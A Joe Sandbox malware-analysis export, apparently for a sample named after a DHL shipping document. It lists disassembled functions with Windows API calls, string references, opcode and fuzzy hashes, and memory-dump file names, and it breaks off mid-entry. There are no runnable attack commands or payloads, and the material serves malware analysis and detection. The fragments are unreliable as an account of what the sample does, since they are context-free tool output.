Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: f4c5248827b2d2522d2f6581495337f4db9706d865129cb870306f496eb75569
Instruction ID: 4a7181158fd758e8389356ccdb70296c6c4d816c4fb4366791348b1a0ad8357e
Opcode Fuzzy Hash: f4c5248827b2d2522d2f6581495337f4db9706d865129cb870306f496eb75569
Instruction Fuzzy Hash: 8FE06D711412247AD7201B62AC8DFEB3E6CEB43BA2F00052AB905E1081AAA88849C7B4

Function 00488863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00409639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00409693
Part of subcall function 00409639: SelectObject.GDI32(?,00000000), ref: 004096A2
Part of subcall function 00409639: BeginPath.GDI32(?), ref: 004096B9
Part of subcall function 00409639: SelectObject.GDI32(?,00000000), ref: 004096E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00488887
LineTo.GDI32(?,?,?), ref: 00488894
EndPath.GDI32(?), ref: 004888A4
StrokePath.GDI32(?), ref: 004888B2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: f00771b6e33574313da17159c0d68837b3eae0e3b5a17d96ff1ca9f4c0999387
Instruction ID: bf58733776772d6f6cef47067b1d94fd51f29bc13e0285c622ae118d30030de2
Opcode Fuzzy Hash: f00771b6e33574313da17159c0d68837b3eae0e3b5a17d96ff1ca9f4c0999387
Instruction Fuzzy Hash: 3DF03A36041258FADB126F94AC49FCE3B59AF06310F448429FA11651E2C7B95511CFAD

Function 004098B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004098CC
SetTextColor.GDI32(?,?), ref: 004098D6
SetBkMode.GDI32(?,00000001), ref: 004098E9
GetStockObject.GDI32(00000005), ref: 004098F1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: a25465d619de842e9eddbea3d1797facefca1aed0756ff273ea85f70b548d9a4
Instruction ID: 3084669143e3b42f37cee25a02c4bf846bf0e195b17a2f0655dae9eab89bc20b
Opcode Fuzzy Hash: a25465d619de842e9eddbea3d1797facefca1aed0756ff273ea85f70b548d9a4
Instruction Fuzzy Hash: F6E06531244240BEEB215B74BC4DBED3F10AB11335F04862EF6F5581E1C37556419F24

Function 0045162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00451634
OpenThreadToken.ADVAPI32(00000000,?,?,?,004511D9), ref: 0045163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004511D9), ref: 00451648
OpenProcessToken.ADVAPI32(00000000,?,?,?,004511D9), ref: 0045164F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9308e8288ff3231809e6777c344af42d0f8fd138b8850db35bce294ae59073ee
Instruction ID: 6da2111cf45dcd7b1c4ab75b25fc3d76e34d1fba515434d7f42e88afbb5813e9
Opcode Fuzzy Hash: 9308e8288ff3231809e6777c344af42d0f8fd138b8850db35bce294ae59073ee
Instruction Fuzzy Hash: CAE04F316012119BD7201BF4AD4DB4B3B68AF56792F154C2DF646C9090D638444587A8

Function 0044D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0044D858
GetDC.USER32(00000000), ref: 0044D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0044D882
ReleaseDC.USER32(?), ref: 0044D8A3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b575fdd04b5741a331108a805ac3fffd82ae8a3a4789143bb800cd5e29319459
Instruction ID: 99c979eb747547dd4dd6bc36a802745f9c9227c1c7ad9ed7ba9e6754b043d6b9
Opcode Fuzzy Hash: b575fdd04b5741a331108a805ac3fffd82ae8a3a4789143bb800cd5e29319459
Instruction Fuzzy Hash: 61E01AB4C00205DFCB41AFF4D94866DFBB2FB48310F108829E906F7250D7384902AF69

Function 0044D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0044D86C
GetDC.USER32(00000000), ref: 0044D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0044D882
ReleaseDC.USER32(?), ref: 0044D8A3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f20b1af578cd7b14dc56216c9b09a9e2836dc538b2cd5d03bdbef0a4535b0687
Instruction ID: d2794ebbd97957c92b67e3e79c0d2f79d4b04198eb684f3a331811f0b7f56c38
Opcode Fuzzy Hash: f20b1af578cd7b14dc56216c9b09a9e2836dc538b2cd5d03bdbef0a4535b0687
Instruction Fuzzy Hash: 1CE01A74C00204DFCB419FB4D84866DBBB1BB48310B108829E90AF7250D7385902AF64

Function 00464D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 003F7620: _wcslen.LIBCMT ref: 003F7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00464ED4

Strings

*, xrefs: 00464E10
LPT, xrefs: 00464DFB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 843bfc84ca4748c937549690544477682e743ed99a331f7ab8aa1aed520baf39
Instruction ID: dcd355d666b1b54ac28dde6d93a25ecd94d18034b52544ac1b7b774975fe1ceb
Opcode Fuzzy Hash: 843bfc84ca4748c937549690544477682e743ed99a331f7ab8aa1aed520baf39
Instruction Fuzzy Hash: B8915275A00204DFCB15DF54C484EAABBF1BF85304F15809AE40A9F3A2D779EE85CB96

Function 0041E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041E30D

Strings

pow, xrefs: 0041E2E5, 0041E302

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: dd1f4dbc635365349f16cc0bbeb0318d2190158ef328d040d6d824dbb31d304c
Instruction ID: ba01213e67fe3d53cc0ddc5762218ac8b8eb004e4a90bb2ce69e75d96788fcf0
Opcode Fuzzy Hash: dd1f4dbc635365349f16cc0bbeb0318d2190158ef328d040d6d824dbb31d304c
Instruction Fuzzy Hash: 15519D75B0C11696CB117726D9413FB3B94AB10740F7489BBE8A5823E9DB3C8CC19A4E

Function 00477771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0044569E,00000000,?,0048CC08,?,00000000,00000000), ref: 004778DD

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

CharUpperBuffW.USER32(0044569E,00000000,?,0048CC08,00000000,?,00000000,00000000), ref: 0047783B

Strings

<sK, xrefs: 004777C8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sK
API String ID: 3544283678-925661131
Opcode ID: c2f85adeb6afae3371b3cdfe3c41e26eda26acf403ae9fcda02af2700be62c91
Instruction ID: dad47bb313354f1058a1043a51790bea501ef376986ad03f30b8db2fea784a56
Opcode Fuzzy Hash: c2f85adeb6afae3371b3cdfe3c41e26eda26acf403ae9fcda02af2700be62c91
Instruction Fuzzy Hash: 326182B691411DAACF06FBA4CC91DFEB3B4BF14300B844526E606B7191EF785A05CBA5

Function 0040E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0040E1B1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 2440b0f3792a3e41879cd639ed595abd2a9ee93bba7ee2aa31b8a06dcf989439
Instruction ID: 3b3e955dd0938784010ff088bc04d699b5e65e78dd195bcb016fdb6a90862baf
Opcode Fuzzy Hash: 2440b0f3792a3e41879cd639ed595abd2a9ee93bba7ee2aa31b8a06dcf989439
Instruction Fuzzy Hash: D5512235500246DFEB15DF2AC0816BA7BA4FF15320F2444ABED91AB3D0D6389D53CBA9

Function 0040F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0040F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0040F2BB

Strings

@, xrefs: 0040F2AF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: ff86ace38ad50c242942c2da51fe4fa8429775e908fe6b7b403cc42f6278cd4b
Instruction ID: d71ef60d6d28df093a1bd47a7fec7bf62fff155a859680e9ebda4eca05d0413b
Opcode Fuzzy Hash: ff86ace38ad50c242942c2da51fe4fa8429775e908fe6b7b403cc42f6278cd4b
Instruction Fuzzy Hash: 7E516B714187499BD320AF14D886BAFBBF8FF84304F81885DF295451A5EB308529CB6A

Function 00475745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004757E0
_wcslen.LIBCMT ref: 004757EC

Strings

CALLARGARRAY, xrefs: 004757E6, 004757EB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: b6ee4bbd473f72e5d26b036ee01ac56fc4cbaf1ca0beedd4403cc32bcdf48957
Instruction ID: 6ad8ce6d639ad521ac0f53c792e6e2658fa01199f4ec9469f7fb7f91ccb03421
Opcode Fuzzy Hash: b6ee4bbd473f72e5d26b036ee01ac56fc4cbaf1ca0beedd4403cc32bcdf48957
Instruction Fuzzy Hash: 6741C331A001099FCB14EFAAC8819FEBBB4EF59314F11806FE509AB391D7789D81CB95

Function 0046D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0046D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0046D13A

Strings

|, xrefs: 0046D10B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: c17dcebfa271b5bfc7af6e3aa754f062b81ec15eda6f6e11a5167fe05911fce3
Instruction ID: 821326b579eb6f70cd99bbf15193cc7c6946395a5b9ef2a8d782d8a7e47e2499
Opcode Fuzzy Hash: c17dcebfa271b5bfc7af6e3aa754f062b81ec15eda6f6e11a5167fe05911fce3
Instruction Fuzzy Hash: 41315D71D00209ABCF15EFA5CD85AEFBFB9FF15300F00001AF915AA261E775AA46CB65

Function 0048356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00483621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0048365C

Strings

static, xrefs: 004835BC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 32c6ecd26b16019dc41a459c9c05e0351126903f6fb3341868c2382a8ace9eff
Instruction ID: e83edfcdf0dc67c7699a9147ffd355f3409b9cee61ad98b817227ed9203f3f3a
Opcode Fuzzy Hash: 32c6ecd26b16019dc41a459c9c05e0351126903f6fb3341868c2382a8ace9eff
Instruction Fuzzy Hash: 0E31A171110604AADB20EF28DC80EBF73A9FF48B24F108A1EF95597290DA34AD81C768

Function 00484537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0048461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00484634

Strings

', xrefs: 0048458E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: d1dc95981cc3bea59e580ab29c8111d41d413f96a16d6d1a7778da92cd078879
Instruction ID: 37667daf07ac6d207e9b774d3a0ffd8943d16143bea6b5b7a1cee2fcca5f2084
Opcode Fuzzy Hash: d1dc95981cc3bea59e580ab29c8111d41d413f96a16d6d1a7778da92cd078879
Instruction Fuzzy Hash: FD313B74A0130AAFDB14DF69C980BDE7BB5FF49300F10446AEA04AB351E774A941CF94

Function 004831EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0048327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00483287

Strings

Combobox, xrefs: 00483249

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 650782aca9830cc24231331b53894bcc6d0bcb1114ca101288279bb128657dd0
Instruction ID: b50a2c0fa1905e0fe9f2230b493bf8a7fd59f102dfbe8c1e8dc15dd6ec523132
Opcode Fuzzy Hash: 650782aca9830cc24231331b53894bcc6d0bcb1114ca101288279bb128657dd0
Instruction Fuzzy Hash: C611E2713002087FEF21AF94DC80EBF376AEB947A5F10092AF91897290D6399D518764

Function 00483710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 003F600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003F604C
Part of subcall function 003F600E: GetStockObject.GDI32(00000011), ref: 003F6060
Part of subcall function 003F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003F606A

GetWindowRect.USER32(00000000,?), ref: 0048377A
GetSysColor.USER32(00000012), ref: 00483794

Strings

static, xrefs: 00483757

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a8f36c70c47c451fcafbd036c14ce7749d5aca08f70bde0c460f1388066573e4
Instruction ID: a5bbf71c25b5a8e37c54d464ec363aee4df3fc81e342fe45c1e8bf28d0903bed
Opcode Fuzzy Hash: a8f36c70c47c451fcafbd036c14ce7749d5aca08f70bde0c460f1388066573e4
Instruction Fuzzy Hash: C7112CB2610209AFDF01EFA8CC45EEE7BB8EB08715F004929FD55E2250D739E8519B64

Function 0046CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0046CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0046CDA6

Strings

<local>, xrefs: 0046CD66

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 6b987dc0bb975297d6b6c6ecf4dd23fd29772f8bd8ee67fb7b584689486d32b7
Instruction ID: c289eba94e55c98190403c0229ddabb3ee848b5623763387be6dc5b6a9a52223
Opcode Fuzzy Hash: 6b987dc0bb975297d6b6c6ecf4dd23fd29772f8bd8ee67fb7b584689486d32b7
Instruction Fuzzy Hash: F111E3712416327AD7244A668CC4EF7BE68EB127A4F00423BB18982180E2789841D6F6

Function 00483429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004834AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004834BA

Strings

edit, xrefs: 0048348F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5b4670f76a7e6c0d0025eed22a16ab55b088ddf301a9595303d92ffe039dda13
Instruction ID: 3edef9051a05f4ad5ede105c0293ca18cbe50c15722231db17cad7db1dda5cd1
Opcode Fuzzy Hash: 5b4670f76a7e6c0d0025eed22a16ab55b088ddf301a9595303d92ffe039dda13
Instruction Fuzzy Hash: CE11B271100108ABEF126E64DC84EBF3769EF05B79F504B25F961932E0C779DC519B68

Function 00456C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

